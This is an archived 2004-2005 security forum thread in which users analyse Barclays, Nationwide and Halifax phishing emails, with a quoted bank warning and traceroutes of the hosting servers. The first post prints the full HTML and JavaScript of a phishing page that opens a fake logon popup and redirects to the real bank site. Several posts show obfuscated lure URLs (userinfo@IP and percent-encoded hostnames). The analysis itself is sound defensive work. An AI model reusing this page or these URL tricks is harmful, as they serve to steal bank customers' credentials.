Just got this Barclays Phishing email

Networking/Security Forums -> Anonymity // Privacy // Spam

Author: browolf PostPosted: Fri Feb 27, 2004 12:14 pm    Post subject: Just got this Barclays Phishing email
    ----
it basically redirects to the real barclays page with a fake popup.

I managed to get the page before it redirects using wget.

thought some might be interested to see how it works. (this isnt an invitation to craft your own phishing scams)

Code:

<html>
<head>
<title>Barclays</title>
 
<script LANGUAGE="JavaScript">

// Browser Detection
isMac = (navigator.appVersion.indexOf("Mac")!=-1) ? true : false;
NS4 = (document.layers) ? true : false;
IEmac = ((document.all)&&(isMac)) ? true : false;
IE4plus = (document.all) ? true : false;
IE4 = ((document.all)&&(navigator.appVersion.indexOf("MSIE 4.")!=-1)) ? true : false;
IE5 = ((document.all)&&(navigator.appVersion.indexOf("MSIE 5.")!=-1)) ? true : false;

IE6 = ((document.all)&&(navigator.appVersion.indexOf("MSIE 6.")!=-1)) ? true : false;
ver4 = (NS4 || IE4plus) ? true : false;
NS6 = (!document.layers) && (navigator.userAgent.indexOf('Netscape')!=-1)?true:false;

IE5plus = IE5 || IE6;
IEMajor = 0;

if (IE4plus)
{
   var start = navigator.appVersion.indexOf("MSIE");
   var end = navigator.appVersion.indexOf(".",start);
   IEMajor = parseInt(navigator.appVersion.substring(start+5,end));
   IE5plus = (IEMajor>=5) ? true : false;
}

// Body onload utility (supports multiple onload functions)
var gSafeOnload = new Array();
function SafeAddOnload(f)
{
   if (IEmac && IE4)  // IE 4.5 blows out on testing window.onload
   {
      window.onload = SafeOnload;
      gSafeOnload[gSafeOnload.length] = f;
   }
   else if  (window.onload)
   {
      if (window.onload != SafeOnload)
      {
         gSafeOnload[0] = window.onload;
         window.onload = SafeOnload;
      }      
      gSafeOnload[gSafeOnload.length] = f;
   }
   else
      window.onload = f;
}
function SafeOnload()
{
   for (var i=0;i<gSafeOnload.length;i++)
      gSafeOnload[i]();
}

function isInt(numIn)
{
   var checknum = parseInt(numIn);
   return !isNaN(checknum);
}

function PUW_Init()
{
   if (gPopupWindow.CheckFrequency())
   {
      setTimeout("gPopupWindow.Show()",gPopupWindow.showDelay);
   }
}

function PUW_Show()
{
   var settings = "width="+this.width+",height="+this.height+",top="+this.top+",left="+this.left+",";
   settings += "scrollbars=" + ((this.scrollbars) ? "yes," : "no,");
   settings += "toolbar=" + ((this.toolbar) ? "yes," : "no,");
   settings += "location=" + ((this.locationbar) ? "yes," : "no,");
   settings += "menubar=" + ((this.menubar) ? "yes," : "no,");
   settings += "status=" + ((this.statusbar) ? "yes," : "no,");
   settings += "resizable=" + ((this.resizable) ? "yes" : "no");
   
   var newWin = window.open(this.url,this.name,settings);
   
   if (! this.ontop)
      window.focus();
}

function PUW_CheckFrequency()
{
   var shouldShow = this.frequency != 0;
   if (this.frequency > 0)
   {
      var allCookies = document.cookie;
      var start = allCookies.indexOf("PUWCount=");
      if (start >= 0)
      {
         var end = allCookies.indexOf(";",start);
         if (end < 0)
            end = allCookies.length;
         var freqStr = allCookies.substring(start+9,end);
         if (isInt(freqStr))
            this.frequency = parseInt(freqStr);
      }

      if (this.frequency>0)
         this.frequency--;
      else
         shouldShow = false;
         
      var exp = new Date();
      exp.setTime(exp.getTime()+this.renew*60*60000);
      document.cookie = "PUWCount="+this.frequency+ "; expires=" + exp.toGMTString();
   }
   
   return shouldShow;
}


function PopupWindow(url,width,height)
{
   this.width = 800;
   this.height = 633;
   this.top = 70
   this.left = 50
   this.name = "mypopupwin";
   this.url = url;
   this.showDelay = 2;
   this.frequency = 200; // how many times show per renewal time period
   this.renew = 1; // renew showing every x hours
   this.scrollbars= true;
   this.toolbar= false;
   this.statusbar= false;
   this.resizable = true;
   this.locationbar = false;
   this.menubar = false;
   this.ontop = false;
   

   
   this.Init = PUW_Init;
   this.Show = PUW_Show;
   this.CheckFrequency = PUW_CheckFrequency;
}

function PUWStart()
{
   gPopupWindow.Init();
}

SafeAddOnload(PUWStart);

gPopupWindow = new PopupWindow("1logon00.htm", 350, 150);
gPopupWindow.toolbar = false;
gPopupWindow.statusbar = true;
gPopupWindow.resizable = true;
gPopupWindow.ontop = true;

</script>
 </head>

<body bgcolor="#FFFFFF" text="#000000">

<META HTTP-EQUIV="Refresh" CONTENT="0; url=http://www.barclays.co.uk/"><div align="center">
  <p>&nbsp;</p>
</div>

</body>
</html>


the url in the email is
http://www.personal.barclays.co.ukgotolpfsplb@142.165.231.19:4925/b/index.htm

in the source of the popup clues are:

these funny tags
<!-- Vignette V/5 Thu Feb 26 13:36:14 2004 -->

the form is posted to
<form method="POST" action="12355600.php">

**MOD EDIT**

Browolf - I feel this topic should be more prominent, have made it a sticky - regards

Author: TinTin PostPosted: Sun Mar 07, 2004 11:49 am    Post subject: topic
    ----
You're absolutely right

Here is the original as posted here https://ibank.barclays.co.uk/olb/q/Welcome.do

SECURITY ALERT: Please read this important message
We are aware that some customers are receiving a message from an email address posing as Barclays Bank.

Instructions on the email advise you to follow a link to what appears to be a Barclays website where you are prompted to enter your personal details.
Barclays is in no way involved with this scam email and the website does not belong to us.

Barclays does not send any emails to customers requesting your security or any other confidential information. Please do not reply to any such emails or follow any links to websites claiming to be Barclays Online Banking.

ALWAYS check the website address at the top of your screen starts with 'https'. This lets you know the site is secure.
Please read our latest information and advice on Online Security


Last edited by TinTin on Sat Dec 17, 2005 7:59 pm; edited 1 time in total

Author: ZCorker PostPosted: Sun Mar 07, 2004 8:34 pm    Post subject: Wget
    ----
May I ask what steps you took to capture the page before it redirects? More a point of curiosity. It might also help me in better understanding how to circumvent authorized redirects which can be a real problem.

I haven't tried wget, but looks like this is a program I should take a look at.

Thanks,
zcorker
<rjs4you(at)netzero.net>

Author: browolf PostPosted: Fri Apr 30, 2004 2:43 pm    Post subject:
    ----
using wget circumvents redirects because redirects are a client-side effect that wget doesnt support.

the windows port of wget is a dos program that just saves the file. no html interpretation is done.

all the phishing scams i've seen involve a fake popup and redirection to the real site. the ones i've seen lately have been running on compromised hosts.

if you use a proxy you have to set it as an enviroment variable before using wget

c:\> set http_proxy=myproxy:8080

Author: Anub!$Location: Computer Chair PostPosted: Fri Apr 30, 2004 3:02 pm    Post subject: Just got this Barclays Phishing email
    ----
A man has been arrested for a case like this, it may be the same one.

Probably is actually.

Here is some more info:

http://www.sophos.com/spaminfo/articles/phishingbust.html

Author: browolf PostPosted: Fri Apr 30, 2004 3:23 pm    Post subject:
    ----
perhaps but the above code is almost identical to a barclays scam i got the other day. which i suspect is a much more sophisticated operation.

see this thread: http://www.security-forums.com/forum/viewtopic.php?t=13539&highlight=

infact just checked now and the code is identical, even the comments are the same.

whoever is running this has being doing so since feb. clearly just moving the code around. at the moment . the domain on the latest one is registered at
YESNIC CO. LTD. [www.yesnic.com]

a coincidence there, the site atm is running thru a korean host. yesnic have a korean version of their page.

yesnic are no stranger to controvery, after a quick google they've been involved in several domain name disputes involving korean citizens.

Author: browolf PostPosted: Wed May 05, 2004 3:31 pm    Post subject:
    ----
just got a nationwide phishing email

Code:

<html><body><p> <a href="http://www.nationwide.co.uk%2E%75%73%65%72%73%65%74%2E%6E%65%74:%34%39%30%33/%6E%77/%69%6E%64%65%78%2E%68%74%6D"> <img src="cid:6C0F0035.58BDF68E.93FFA922.DF54F0DF_csseditor" ALT="" border="0">
</a>
</p><p>
<font color="#FFFFF4">Romeo MGM Dr. Dree in 1849 Sure</font>
</p></body></html>


the obfuscated domain is almost the same as the barclays one

http://www.nationwide.co.uk.userset.net:4903/nw/index.htm

the userset domain seems have moved away from the korean school

the url without the port and file now gives a
ERROR
The requested URL could not be retrieved

While trying to retrieve the URL: http://www.personal.barclays.co.uk.userset.net/
The following error was encountered:
* Connection Failed
The system returned:
(111) Connection refused

but a traceroute leads to
Quote:

traceroute to www.nationwide.co.uk.userset.net (65.24.44.40), 30 hops max, 40 byte packets
3 ldn-b4-feth4-1.telia.net (213.248.75.65) 0.314 ms 0.246 ms 0.167 ms
4 ldn-bb2-pos5-2-0.telia.net (213.248.65.101) 0.370 ms 0.427 ms 0.417 ms
5 ldn-b2-pos8-0.telia.net (213.248.74.10) 1.532 ms 0.692 ms 0.495 ms
6 aol-01135-ldn-b2.telia.net (213.248.75.70) 0.731 ms 0.542 ms 0.378 ms
7 bb2-loh-P6-0.atdn.net (66.185.136.242) 0.698 ms 0.640 ms 0.629 ms
8 bb2-nye-P5-0.atdn.net (66.185.152.140) 72.528 ms 72.729 ms 72.507 ms
9 bb1-nye-P2-0.atdn.net (66.185.153.20) 72.658 ms 72.496 ms 72.735 ms
10 bb2-ash-P10-0.atdn.net (66.185.152.87) 73.843 ms 105.597 ms 73.648 ms
11 bb2-cin-P3-0.atdn.net (66.185.153.61) 91.878 ms 91.722 ms 91.726 ms
12 pop1-cin-P1-0.atdn.net (66.185.133.3) 92.169 ms 92.106 ms 92.333 ms
13 RR-Cincinnati.atdn.net (66.185.133.10) 92.346 ms 92.664 ms 92.481 ms
14 pos13-0.clmboh1-rtr3.columbus.rr.com (65.25.128.230) 95.299 ms 95.386 ms 95.394 ms
15 srp0-0.clmboh1-rtr1.columbus.rr.com (65.25.129.97) 95.720 ms 96.052 ms 95.707 ms
16 srp1-0.nwrmoh1-ubr1.columbus.rr.com (24.95.81.166) 96.788 ms 96.681 ms 96.834 ms
17 dhcp065-024-044-040.columbus.rr.com (65.24.44.40) 101.174 ms 101.851 ms 102.388 ms



we'll sooon have that shutdown Very Happy

Author: browolf PostPosted: Thu May 06, 2004 4:49 pm    Post subject:
    ----
just got a halifax one.

pointing at

www.halifax-online.co.uk.userset.net:4903/b/index.htm

but it doesnt seem to resolve properly.

infact all the traceroutes seem to get as far as
11 94 125 109 195.60.31.254 telehouse-gw-1.power.net.uk

then cant get any further, just timeouts..hmm how odd. wonder what that means. perhaps its been terminated already. heh it;s getting bad for them when the scams are down before the victims receive the email.

Author: carl04 PostPosted: Wed Jul 07, 2004 8:42 pm    Post subject: .
    ----
what is email phishing?

Author: squidlyLocation: Umm.. I dont know.. somewhere PostPosted: Thu Jul 08, 2004 10:34 pm    Post subject:
    ----
carl04 wrote:
what is email phishing?


phishing is when someone trys to make an email look like it comes from someplace you are supposed to trus, such as your bank, your ISP, and get you to give them some sensitive info from you.

Author: browolf PostPosted: Tue Nov 29, 2005 11:01 pm    Post subject:
    ----
talking of barclays phishing I've been getting an awful lot of these recently in my bt mail and at work. i have my bt mail forwarded to gmail which catches 95% of the spam. it seems to be distinguishing between spam and phish as a warning appears with the phish. well some of them. it warns on the barclays ones but not the halifax or lloyds ones. Got 6 today in total. 4 of them all came different compromised hosts but with the similarities of the port (680) and the path(/rock/x) where x is a single letter representing the bank e.g. l for lloyds, h for halifax. another one used port 780 instead.



Networking/Security Forums -> Anonymity // Privacy // Spam


output generated using printer-friendly topic mod, All times are GMT + 2 Hours

Page 1 of 1

Powered by phpBB 2.0.x © 2001 phpBB Group